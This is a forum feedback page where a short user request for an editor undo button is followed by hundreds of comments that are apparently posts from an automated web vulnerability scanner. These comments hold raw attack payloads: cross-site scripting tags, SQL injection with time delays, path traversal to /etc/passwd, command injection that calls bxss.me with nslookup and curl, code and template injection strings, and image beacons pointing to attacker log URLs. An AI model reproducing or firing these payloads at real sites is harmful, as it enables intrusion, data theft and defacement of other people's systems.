Feedback

You guys need an undo button by Idrees - 161 months ago

I dont know if you have this in the editor already but you guys need to make it so you can delete your previous line or something

• BeyPokéDig

  You can already - or at least you could 12 days ago - you need to doubleclick on the point that you want to delete, if I remember correctly. Try experimenting with the editor first before trying to build something :)

• Erik

  If you doubleclick anything it will disappear. We're brainstorming on how we can make the designer more user friendly to make it easier for everyone.

• lxbfYeaa

  1

• JJJ3QQQ

  JJJ30QQQ

• WfxYANoW

  1

• WfxYANoW

  1CepfYKIkiO

• 1DySRZsTncO

  1

• WfxYANoW

  1<esi:include src="http://bxss.me/rpb.png"/>

• WfxYANoW

  ${9999191+9999662}

• ${10000342+9999729}

  1

• WfxYANoW

  http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

• WfxYANoW

  ../../../../../../../../../../../../../../etc/passwd

• WfxYANoW

  response.write(9014549*9827263)

• WfxYANoW

  '+response.write(9014549*9827263)+'

• WfxYANoW

  ../../../../../../../../../../../../../../windows/win.ini

• Anonymous

  1

• WfxYANoW

  file:///etc/passwd

• WfxYANoW

  1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

• WfxYANoW

  echo bfqirw$()\ yjpngz\nz^xyu||a #' &echo bfqirw$()\ yjpngz\nz^xyu||a #|" &echo bfqirw$()\ yjpngz\nz^xyu||a #

• WfxYANoW

  Http://bxss.me/t/fit.txt

• WfxYANoW

  1

• WfxYANoW

  http://bxss.me/t/fit.txt?.jpg

• WfxYANoW

  &echo rwpjfc$()\ zsrsmz\nz^xyu||a #' &echo rwpjfc$()\ zsrsmz\nz^xyu||a #|" &echo rwpjfc$()\ zsrsmz\nz^xyu||a #

• WfxYANoW

  ../1

• WfxYANoW

  "+response.write(9014549*9827263)+"

• WfxYANoW

  /etc/shells

• WfxYANoW

  1&echo ltvmip$()\ dcsugh\nz^xyu||a #' &echo ltvmip$()\ dcsugh\nz^xyu||a #|" &echo ltvmip$()\ dcsugh\nz^xyu||a #

• response.write(9733394*9110953)

  1

• WfxYANoW

  |echo mxgqkc$()\ fhwbtu\nz^xyu||a #' |echo mxgqkc$()\ fhwbtu\nz^xyu||a #|" |echo mxgqkc$()\ fhwbtu\nz^xyu||a #

• WfxYANoW

  ../../../../../../../../../../../../../../etc/shells

• WfxYANoW

  Sznuyoly

• file:///etc/passwd

  1

• '+response.write(9733394*9110953)+'

  1

• WfxYANoW

  1&n995057=v923340

• WfxYANoW

  c:/windows/win.ini

• WfxYANoW

  1|echo yrfdbk$()\ fwyjeg\nz^xyu||a #' |echo yrfdbk$()\ fwyjeg\nz^xyu||a #|" |echo yrfdbk$()\ fwyjeg\nz^xyu||a #

• WfxYANoW

  1

• WfxYANoW

  zcg7G6vR: NFxZP5xI

• "+response.write(9733394*9110953)+"

  1

• WfxYANoW

  (nslookup -q=cname hittixhpljeqn04ff2.bxss.me||curl hittixhpljeqn04ff2.bxss.me))

• ../WfxYANoW

  1

• yl0YBNwV

  1

• WfxYANoW&n921868=v903567

  1

• HsdHq8SP: kt5qQo09

  1

• SXlINXNXZEM=

  1

• WfxYANoW

  bxss.me

• WfxYANoW

  )

• WfxYANoW

  '.gethostbyname(lc('hitom'.'zfnmagjqe2580.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(65).chr(97).chr(71).'

• WfxYANoW

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

• WfxYANoW

  ".gethostbyname(lc("hitnp"."cotsxblc43e47.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(70).chr(117).chr(80)."

• WfxYANoW

  1

• 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

  1

• WfxYANoW

  gethostbyname(lc('hitpe'.'mpulqnig1917a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(86).chr(120).chr(71)

• WfxYANoW

  ';print(md5(31337));$a='

• Http://bxss.me/t/fit.txt

  1

• WfxYANoW

  $(nslookup -q=cname hithkootdcygnb9ded.bxss.me||curl hithkootdcygnb9ded.bxss.me)

• WfxYANoW

  ";print(md5(31337));$a="

• http://bxss.me/t/fit.txt?.jpg

  1

• WfxYANoW

  &nslookup -q=cname hittmqpuvuzllc39d0.bxss.me&'\"`0&nslookup -q=cname hittmqpuvuzllc39d0.bxss.me&`'

• WfxYANoW

  !(()&&!|*|*|

• WfxYANoW

  &(nslookup -q=cname hittmomawpveube727.bxss.me||curl hittmomawpveube727.bxss.me)&'\"`0&(nslookup -q=cname hittmomawpveube727.bxss.me||curl hittmomawpveube727.bxss.me)&`'

• WfxYANoW

  ${@print(md5(31337))}

• WfxYANoW

  ^(#$!@#$)(()))******

• WfxYANoW

  |(nslookup -q=cname hitscxfdihrcy5c447.bxss.me||curl hitscxfdihrcy5c447.bxss.me)

• /etc/shells

  1

• )

  1

• WfxYANoW

  '"()

• !(()&&!|*|*|

  1

• WfxYANoW

  1'&&sleep(27*1000)*eykkyk&&'

• ^(#$!@#$)(()))******

  1

• WfxYANoW

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

• WfxYANoW

  `(nslookup -q=cname hitmyiynbiqvt74681.bxss.me||curl hitmyiynbiqvt74681.bxss.me)`

• WfxYANoW

  ${@print(md5(31337))}\

• WfxYANoW

  1

• WfxYANoW

  xfs.bxss.me

• c:/windows/win.ini

  1

• WfxYANoW

  1"&&sleep(27*1000)*mftyxd&&"

• WfxYANoW

  ;(nslookup -q=cname hitvjrlqyngdbcc0c2.bxss.me||curl hitvjrlqyngdbcc0c2.bxss.me)|(nslookup -q=cname hitvjrlqyngdbcc0c2.bxss.me||curl hitvjrlqyngdbcc0c2.bxss.me)&(nslookup -q=cname hitvjrlqyngdbcc0c2.bxss.me||curl hitvjrlqyngdbcc0c2.bxss.me)

• WfxYANoW

  '"

• bxss.me

  1

• WfxYANoW

  1'"()&%<zzz><ScRiPt >AWJu(9173)</ScRiPt>

• xfs.bxss.me

  1

• WfxYANoW

  |(nslookup${IFS}-q${IFS}cname${IFS}hitdikuodvdgs2cc43.bxss.me||curl${IFS}hitdikuodvdgs2cc43.bxss.me)

• WfxYANoW

  '.print(md5(31337)).'

• WfxYANoW

  "+"A".concat(70-3).concat(22*4).concat(100).concat(76).concat(100).concat(72)+(require"socket" Socket.gethostbyname("hitds"+"etbyfvnjf023a.bxss.me.")[3].to_s)+"

• WfxYANoW

  <!--

• WfxYANoW

  1'||sleep(27*1000)*bqejvh||'

• WfxYANoW

  HttP://bxss.me/t/xss.html?%00

• '"

  1

• WfxYANoW

  &(nslookup${IFS}-q${IFS}cname${IFS}hitjubwyibcsw2039f.bxss.me||curl${IFS}hitjubwyibcsw2039f.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitjubwyibcsw2039f.bxss.me||curl${IFS}hitjubwyibcsw2039f.bxss.me)&`'

• WfxYANoW

  bxss.me/t/xss.html?%00

• WfxYANoW

  '+'A'.concat(70-3).concat(22*4).concat(122).concat(66).concat(121).concat(83)+(require'socket' Socket.gethostbyname('hitzs'+'zztoszsd351e9.bxss.me.')[3].to_s)+'

• HttP://bxss.me/t/xss.html?%00

  1

• <!--

  1

• WfxYANoW

  'A'.concat(70-3).concat(22*4).concat(98).concat(88).concat(107).concat(82)+(require'socket' Socket.gethostbyname('hitvq'+'lbuucfezbcad0.bxss.me.')[3].to_s)

• WfxYANoW

  1"||sleep(27*1000)*oruaeu||"

• bxss.me/t/xss.html?%00

  1

• WfxYANoW

  '"()&%<zzz><ScRiPt >AWJu(9555)</ScRiPt>

• WfxYANoW

  comment

• ';print(md5(31337));$a='

  1

• WfxYANoW

  1

• WfxYANoW

  comment

• ";print(md5(31337));$a="

  1

• '"()

  1

• WfxYANoW

  comment/.

• WfxYANoW

  19260417

• WfxYANoW'&&sleep(27*1000)*ivwyyw&&'

  1

• ${@print(md5(31337))}

  1

• ${@print(md5(31337))}\

  1

• comment

  1

• WfxYANoW"&&sleep(27*1000)*vbaeyc&&"

  1

• WfxYANoW

  bfg4994＜s1﹥s2ʺs3ʹhjl4994

• comment

  1

• '.print(md5(31337)).'

  1

• comment/.

  1

• WfxYANoW'||sleep(27*1000)*gesvdd||'

  1

• WfxYANoW"||sleep(27*1000)*fhwqli||"

  1

• WfxYANoW

  <%={{={@{#{${dfb}}%>

• WfxYANoW

  <th:t="${dfb}#foreach

• WfxYANoW

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

• WfxYANoW

  dfb{{98991*97996}}xca

• WfxYANoW

  dfb[[${98991*97996}]]xca

• WfxYANoW

  dfb__${98991*97996}__::.x

• WfxYANoW

  1

• WfxYANoW

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

• WfxYANoW

  1<ScRiPt >AWJu(9503)</ScRiPt>

• WfxYANoW

  1<W1FD90>LTWKC[!+!]</W1FD90>

• WfxYANoW

  1<script>AWJu(9243)</script>

• WfxYANoW

  1<script>AWJu(9090)</script>9090

• WfxYANoW

  1<ScR<ScRiPt>IpT>AWJu(9701)</sCr<ScRiPt>IpT>

• WfxYANoW

  1<ScRiPt >AWJu(9500)</ScRiPt>

• WfxYANoW

  1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9061></ScRiPt>

• WfxYANoW

  1<ScRiPt >AWJu(9951)</ScRiPt>

• WfxYANoW

  1JIIGY0SX

• WfxYANoW

  1<isindex type=image src=1 onerror=AWJu(9557)>

• WfxYANoW

  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9783'>

• WfxYANoW

  1<body onload=AWJu(9672)>

• WfxYANoW

  1<img src=//xss.bxss.me/t/dot.gif onload=AWJu(9353)>

• WfxYANoW

  1<img src=xyz OnErRor=AWJu(9123)>

• WfxYANoW

  1<img/src=">" onerror=alert(9911)>

• WfxYANoW

  %31%3C%53%63%52%69%50%74%20%3E%41%57%4A%75%289900%29%3C%2F%73%43%72%69%70%54%3E

• WfxYANoW

  1

• WfxYANoW

  -1 OR 2+792-792-1=0+0+0+1 --

• WfxYANoW

  -1 OR 2+992-992-1=0+0+0+1

• WfxYANoW

  1\u003CScRiPt\AWJu(9233)\u003C/sCripT\u003E

• WfxYANoW

  -1' OR 2+44-44-1=0+0+0+1 --

• WfxYANoW

  -1' OR 2+409-409-1=0+0+0+1 or 'LeOuAmIw'='

• WfxYANoW

  1&lt;ScRiPt&gt;AWJu(9094)&lt;/sCripT&gt;

• WfxYANoW

  -1" OR 2+788-788-1=0+0+0+1 --

• WfxYANoW

  1<input autofocus onfocus=AWJu(9513)>

• WfxYANoW

  <a HrEF=http://xss.bxss.me></a>

• WfxYANoW

  <a HrEF=jaVaScRiPT:>

• WfxYANoW

  1}body{zzz:Expre/**/SSion(AWJu(9292))}

• WfxYANoW

  11mZAQ <ScRiPt >AWJu(9452)</ScRiPt>

• WfxYANoW

  1<WVNZTK>UXBIL[!+!]</WVNZTK>

• WfxYANoW

  1<ifRAme sRc=9081.com></IfRamE>

• WfxYANoW

  1<ap1bhok x=9580>

• WfxYANoW

  1<img sRc='http://attacker-9217/log.php?

• WfxYANoW

  1<aPmWZNX<

• WfxYANoW'"()&%<zzz><ScRiPt >AWJu(9285)</ScRiPt>

  1

• WfxYANoW

  1*if(now()=sysdate(),sleep(15),0)

• '"()&%<zzz><ScRiPt >AWJu(9584)</ScRiPt>

  1

• WfxYANoW9680191

  1

• bfg4510＜s1﹥s2ʺs3ʹhjl4510

  1

• <%={{={@{#{${dfb}}%>

  1

• <th:t="${dfb}#foreach

  1

• 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

  1

• dfb{{98991*97996}}xca

  1

• dfb[[${98991*97996}]]xca

  1

• dfb__${98991*97996}__::.x

  1

• "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

  1

• WfxYANoW<ScRiPt >AWJu(9962)</ScRiPt>

  1

• WfxYANoW

  10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

• WfxYANoW<W5LVQN>EBIWZ[!+!]</W5LVQN>

  1

• WfxYANoW<script>AWJu(9168)</script>

  1

• WfxYANoW<script>AWJu(9239)</script>9239

  1

• WfxYANoW<ScRiPt >AWJu(9215)</ScRiPt>

  1

• WfxYANoW<ScRiPt >AWJu(9740)</ScRiPt>

  1

• WfxYANoW<body onload=AWJu(9453)>

  1

• WfxYANoW<img src=xyz OnErRor=AWJu(9133)>

  1

• WfxYANoW<img/src=">" onerror=alert(9904)>

  1

• WfxYANoW\u003CScRiPt\AWJu(9327)\u003C/sCripT\u003E

  1

• WfxYANoW&lt;ScRiPt&gt;AWJu(9028)&lt;/sCripT&gt;

  1

• WfxYANoW<input autofocus onfocus=AWJu(9748)>

  1

• WfxYANoW

  10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

• <a HrEF=http://xss.bxss.me></a>

  1

• <a HrEF=jaVaScRiPT:>

  1

• WfxYANoW}body{zzz:Expre/**/SSion(AWJu(9469))}

  1

• WfxYANoWbsyXp <ScRiPt >AWJu(9723)</ScRiPt>

  1

• WfxYANoW<W0934B>8BL50[!+!]</W0934B>

  1

• WfxYANoW<ifRAme sRc=9129.com></IfRamE>

  1

• WfxYANoW<atRty3x x=9237>

  1

• WfxYANoW<img sRc='http://attacker-9645/log.php?

  1

• WfxYANoW<a3vF6Kk<

  1

• WfxYANoW

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

• WfxYANoW

  1-1; waitfor delay '0:0:15' --

• WfxYANoW

  1-1); waitfor delay '0:0:15' --

• WfxYANoW

  1-1 waitfor delay '0:0:15' --

• WfxYANoW

  18MEgS2Fy'; waitfor delay '0:0:15' --

• WfxYANoW

  1-1 OR 399=(SELECT 399 FROM PG_SLEEP(15))--

• WfxYANoW

  1-1) OR 934=(SELECT 934 FROM PG_SLEEP(15))--

• WfxYANoW

  1-1)) OR 587=(SELECT 587 FROM PG_SLEEP(15))--

• WfxYANoW

  17DKE6W1O' OR 48=(SELECT 48 FROM PG_SLEEP(15))--

• WfxYANoW

  18UFa2Wif') OR 626=(SELECT 626 FROM PG_SLEEP(15))--

• WfxYANoW

  1L9KUwFN9')) OR 404=(SELECT 404 FROM PG_SLEEP(15))--

• WfxYANoW

  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

• WfxYANoW

  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

• WfxYANoW

  1'"

• WfxYANoW

  @@6MIFF

• WfxYANoW

  1

• WfxYANoW

  1

• WfxYANoWbJwFsN9O

  1

• WfxYANoW

  1

• -1 OR 2+178-178-1=0+0+0+1 --

  1

• -1 OR 2+413-413-1=0+0+0+1

  1

• -1' OR 2+91-91-1=0+0+0+1 --

  1

• -1' OR 2+734-734-1=0+0+0+1 or 'STiderYg'='

  1

• -1" OR 2+802-802-1=0+0+0+1 --

  1

• if(now()=sysdate(),sleep(15),0)

  1

• WfxYANoW-1 waitfor delay '0:0:15' --

  1

• WfxYANoWIZI0uYGS'; waitfor delay '0:0:15' --

  1

• WfxYANoW'"

  1

• @@vDovm

  1

• Pecedec150

  555-555-0199@example.com

• Pecedec150

  555-555-0199@example.com

• hriwqwgn

  1

• oamaqyom

  response.write(9735584*9314496)

• ajghtten

  1

• oamaqyom

  '+response.write(9735584*9314496)+'

• ajghtten

  1

• oamaqyom

  "+response.write(9735584*9314496)+"

• pdqhicrt

  set|set&set

• ajghtten

  16s73fuL

• response.write(9376453*9644903)

  1

• pdqhicrt

  $(nslookup Zf50DdO3)

• ajghtten

  -1 OR 2+685-685-1=0+0+0+1 --

• '+response.write(9376453*9644903)+'

  1

• pdqhicrt

  &nslookup 7SJHWPXf&'\"`0&nslookup 7SJHWPXf&`'

• ajghtten

  -1 OR 2+390-390-1=0+0+0+1

• kqlgvppw

  nrfYRZei

• "+response.write(9376453*9644903)+"

  1

• set|set&set

  1

• ajghtten

  -1' OR 2+467-467-1=0+0+0+1 --

• hghMuCg9

  1

• tkdqhnju

  ../../../../../../../../../../etc/passwd

• fnawnrfa

  1

• $(nslookup elco8TAd)

  1

• ajghtten

  -1' OR 2+548-548-1=0+0+0+1 or 'P3AQZ4bZ'='

• oanoxxnt

  ${10000472+9999949}

• tkdqhnju

  ../../../../../../../../../../../../../../../proc/version

• &nslookup J7LE8d0g&'\"`0&nslookup J7LE8d0g&`'

  1

• ajghtten

  -1" OR 2+197-197-1=0+0+0+1 --

• ${9999944+9999766}

  1

• egimumle

  http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

• tkdqhnju

  ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

• a2FUdm1DOEk=

  1

• ajghtten

  if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

• cqmxvdng

  1&n910455=v995649

• egimumle

  1some_inexistent_file_with_long_name.jpg

• tkdqhnju

  ../../../../../../../../../../etc/passwd.jpg

• kngdcpia

  )

• pqlihlla

  ;print(md5(acunetix_wvs_security_test));

• ajghtten

  if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/

• egimumle

  Http://testasp.vulnweb.com/t/fit.txt

• tkdqhnju

  ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

• kngdcpia

  !(()&&!|*|*|

• fnawnrfa

  1

• aelnovhm

  '"()

• pqlihlla

  ';print(md5(acunetix_wvs_security_test));$a='

• ajghtten

  (select(0)from(select(sleep(7)))v)/*'+(select(0)from(select(sleep(7)))v)+'"+(select(0)from(select(sleep(7)))v)+"*/

• kgogiguv&n984423=v968922

  1

• egimumle

  http://testasp.vulnweb.com/t/fit.txt?.jpg

• tkdqhnju

  /../..//../..//../..//../..//../..//etc/passwd.jpg

• kngdcpia

  ^(#$!@#$)(()))******

• Anonymous

  1

• pqlihlla

  ";print(md5(acunetix_wvs_security_test));$a="

• ajghtten

  -1; waitfor delay '0:0:7' --

• egimumle

  testasp.vulnweb.com

• tkdqhnju

  .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

• )

  1

• '"()

  1

• pqlihlla

  ${@print(md5(acunetix_wvs_security_test))}

• ajghtten

  -1); waitfor delay '0:0:7' --

• nhqodxyg

  http://testasp.vulnweb.com/t/xss.html?%00.jpg

• tkdqhnju

  /etc/passwd

• !(()&&!|*|*|

  1

• unqshcdx

  1

• pqlihlla

  ${@print(md5(acunetix_wvs_security_test))}\

• ajghtten

  1 waitfor delay '0:0:7' --

• http://testasp.vulnweb.com/t/xss.html?%00.jpg

  1

• 1some_inexistent_file_with_long_name.jpg

  1

• tkdqhnju

  %2fetc%2fpasswd

• ^(#$!@#$)(()))******

  1

• fxepojgc

  http://hitB1fwNwtVwk.bxss.me/

• unqshcdx

  comment

• ;print(md5(acunetix_wvs_security_test));

  1

• lsyrdwhf

  1

• ajghtten

  zcmGXYX0'; waitfor delay '0:0:7' --

• Http://testasp.vulnweb.com/t/fit.txt

  1

• tkdqhnju

  /.././.././.././.././.././.././.././../etc/./passwd%00

• jjttesas

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

• unqshcdx

  comment

• http://hitjtHzQeOXxP.bxss.me/

  1

• ';print(md5(acunetix_wvs_security_test));$a='

  1

• lsyrdwhf

  1'"

• ajghtten

  -1;select pg_sleep(7); --

• http://testasp.vulnweb.com/t/fit.txt?.jpg

  1

• tkdqhnju

  ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

• unqshcdx

  comment/.

• cicvsrwe

  /www.vulnweb.com

• ";print(md5(acunetix_wvs_security_test));$a="

  1

• lsyrdwhf

  \

• ajghtten

  -1);select pg_sleep(10); --

• testasp.vulnweb.com

  1

• tkdqhnju

  ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

• plttaoix

  '"

• unqshcdx

  1

• /www.vulnweb.com

  1

• ${@print(md5(acunetix_wvs_security_test))}

  1

• ajghtten

  -1));select pg_sleep(10); --

• scqymnfh

  1'"()&%<acx><ScRiPt >DY3v(9964)</ScRiPt>

• plttaoix

  <!--

• comment

  1

• ${@print(md5(acunetix_wvs_security_test))}\

  1

• lsyrdwhf

  @@1RhaO

• ajghtten

  MZ0z7Jhl';select pg_sleep(10); --

• tkdqhnju

  invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

• '"

  1

• comment

  1

• lsyrdwhf

  JyI=

• ajghtten

  FPli4WiV');select pg_sleep(10); --

• scqymnfh

  '"()&%<acx><ScRiPt >DY3v(9720)</ScRiPt>

• tkdqhnju

  file:///etc/passwd

• <!--

  1

• comment/.

  1

• ajghtten

  rVi5qEWm'));select pg_sleep(10); --

• tkdqhnju

  /\../\../\../\../\../\../\../etc/passwd

• ajghtten

  1

• scqymnfh

  1_9035

• tkdqhnju

  WEB-INF/web.xml

• lsyrdwhf

  (select convert(int,CHAR(65)))

• ajghtten

  1

• tkdqhnju

  /WEB-INF/web.xml

• lsyrdwhf

  1

• BCInEJsr

  1

• scqymnfh

  acu10113＜s1﹥s2ʺs3ʹuca10113

• tkdqhnju

  WEB-INF\web.xml

• 1'"

  1

• -1 OR 2+267-267-1=0+0+0+1 --

  1

• ../../../../../../../../../../etc/passwd

  1

• \

  1

• -1 OR 2+476-476-1=0+0+0+1

  1

• -1' OR 2+310-310-1=0+0+0+1 --

  1

• @@sEm2M

  1

• -1' OR 2+215-215-1=0+0+0+1 or 'RMKovgVR'='

  1

• scqymnfh

  {{10000013*9999205}}

• ../../../../../../../../../../etc/passwd.jpg

  1

• JyI=

  1

• -1" OR 2+746-746-1=0+0+0+1 --

  1

• scqymnfh

  1<ScRiPt >DY3v(9499)</ScRiPt>

• .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

  1

• (select convert(int,CHAR(65)))

  1

• 1 waitfor delay '0:0:10' --

  1

• /etc/passwd

  1

• scqymnfh

  1<WWT9IG>QZ3KR[!+!]</WWT9IG>

• 0hOdJshn'; waitfor delay '0:0:10' --

  1

• %2fetc%2fpasswd

  1

• NHsEtiGX';select pg_sleep(15); --

  1

• scqymnfh

  1<script>DY3v(9292)</script>

• zjamPqYS');select pg_sleep(15); --

  1

• IN7nSjGf'));select pg_sleep(15); --

  1

• scqymnfh

  1<ScR<ScRiPt>IpT>DY3v(9234)</sCr<ScRiPt>IpT>

• scqymnfh

  1<ScRiPt >DY3v(9455)</ScRiPt>

• file:///etc/passwd

  1

• /\../\../\../\../\../\../\../etc/passwd

  1

• scqymnfh

  1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9440></ScRiPt>

• WEB-INF/web.xml

  1

• /WEB-INF/web.xml

  1

• scqymnfh

  1<ScRiPt >DY3v(9950)</ScRiPt>

• WEB-INF\web.xml

  1

• scqymnfh

  1<video><source onerror="javascript:DY3v(9374)">

• scqymnfh

  1<isindex type=image src=1 onerror=DY3v(9956)>

• scqymnfh

  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9067'>

• scqymnfh

  1<body onload=DY3v(9353)>

• scqymnfh

  1<img src=//testasp.vulnweb.com/t/dot.gif onload=DY3v(9813)>

• scqymnfh

  1<img src=xyz OnErRor=DY3v(9568)>

• scqymnfh

  1<img/src=">" onerror=alert(9037)>

• scqymnfh

  %31%3C%53%63%52%69%50%74%20%3E%44%59%33%76%289098%29%3C%2F%73%43%72%69%70%54%3E

• scqymnfh

  1\u003CScRiPt\DY3v(9822)\u003C/sCripT\u003E

• scqymnfh

  1&lt;ScRiPt&gt;DY3v(9939)&lt;/sCripT&gt;

• scqymnfh

  1<input autofocus onfocus=DY3v(9775)>

• scqymnfh

  <a HrEF=http://www.vulnweb.com></a>

• scqymnfh

  <a HrEF=jaVaScRiPT:>

• scqymnfh

  [url=http://www.vulnweb.com][/url]

• scqymnfh

  1<img<!-- --> src=x onerror=alert(9032);//><!-- -->

• scqymnfh

  1}body{acu:Expre/**/SSion(DY3v(9176))}

• scqymnfh

  1<% contenteditable onresize=DY3v(9646)>

• scqymnfh

  1_v2Ja5 <ScRiPt >DY3v(9511)</ScRiPt>

• scqymnfh

  1<WSNXYP>CI8UM[!+!]</WSNXYP>

• scqymnfh

  1<ifRAme sRc=9848.com></IfRamE>

• scqymnfh

  1<efD1ae x=9506>

• scqymnfh

  1<img sRc='http://attacker-9232/log.php?

• scqymnfh'"()&%<acx><ScRiPt >DY3v(9976)</ScRiPt>

  1

• '"()&%<acx><ScRiPt >DY3v(9579)</ScRiPt>

  1

• scqymnfh_9846

  1

• acu10313＜s1﹥s2ʺs3ʹuca10313

  1

• {{10000099*9999894}}

  1

• scqymnfh<ScRiPt >DY3v(9649)</ScRiPt>

  1

• scqymnfh<WIPFMJ>M7ZQM[!+!]</WIPFMJ>

  1

• scqymnfh<script>DY3v(9401)</script>

  1

• scqymnfh<ScRiPt >DY3v(9530)</ScRiPt>

  1

• scqymnfh<ScRiPt >DY3v(9420)</ScRiPt>

  1

• scqymnfh<body onload=DY3v(9285)>

  1

• scqymnfh<img src=xyz OnErRor=DY3v(9769)>

  1

• scqymnfh<img/src=">" onerror=alert(9830)>

  1

• scqymnfh\u003CScRiPt\DY3v(9610)\u003C/sCripT\u003E

  1

• scqymnfh&lt;ScRiPt&gt;DY3v(9576)&lt;/sCripT&gt;

  1

• scqymnfh<input autofocus onfocus=DY3v(9973)>

  1

• <a HrEF=http://www.vulnweb.com></a>

  1

• <a HrEF=jaVaScRiPT:>

  1

• [url=http://www.vulnweb.com][/url]

  1

• scqymnfh}body{acu:Expre/**/SSion(DY3v(9090))}

  1

• scqymnfh<% contenteditable onresize=DY3v(9095)>

  1

• scqymnfh_He5Ek <ScRiPt >DY3v(9726)</ScRiPt>

  1

• scqymnfh<W1BBUT>2K6MX[!+!]</W1BBUT>

  1

• scqymnfh<ifRAme sRc=9261.com></IfRamE>

  1

• scqymnfh<K5vQjr x=9448>

  1

• scqymnfh<img sRc='http://attacker-9012/log.php?

  1

• dwUQQUrL

  1

• dwUQQUrL

  1

• dwUQQUrL

  1

• dwUQQUrL

  1yutwojhE

• dwUQQUrL

  1

• dwUQQUrL

  -1 OR 2+406-406-1=0+0+0+1 --

• dwUQQUrL

  -1 OR 2+173-173-1=0+0+0+1

• dwUQQUrL

  -1' OR 2+364-364-1=0+0+0+1 --

• dwUQQUrL

  -1' OR 2+160-160-1=0+0+0+1 or 'be524bhX'='

• dwUQQUrL

  -1" OR 2+183-183-1=0+0+0+1 --

• dwUQQUrL

  1*if(now()=sysdate(),sleep(15),0)

• dwUQQUrL

  10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

• dwUQQUrL

  10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

• dwUQQUrL

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

• dwUQQUrL

  1-1; waitfor delay '0:0:15' --

• dwUQQUrL

  1-1); waitfor delay '0:0:15' --

• dwUQQUrL

  1-1 waitfor delay '0:0:15' --

• dwUQQUrL

  1l9VHN2jP'; waitfor delay '0:0:15' --

• dwUQQUrL

  1-1 OR 428=(SELECT 428 FROM PG_SLEEP(15))--

• dwUQQUrL

  1-1) OR 103=(SELECT 103 FROM PG_SLEEP(15))--

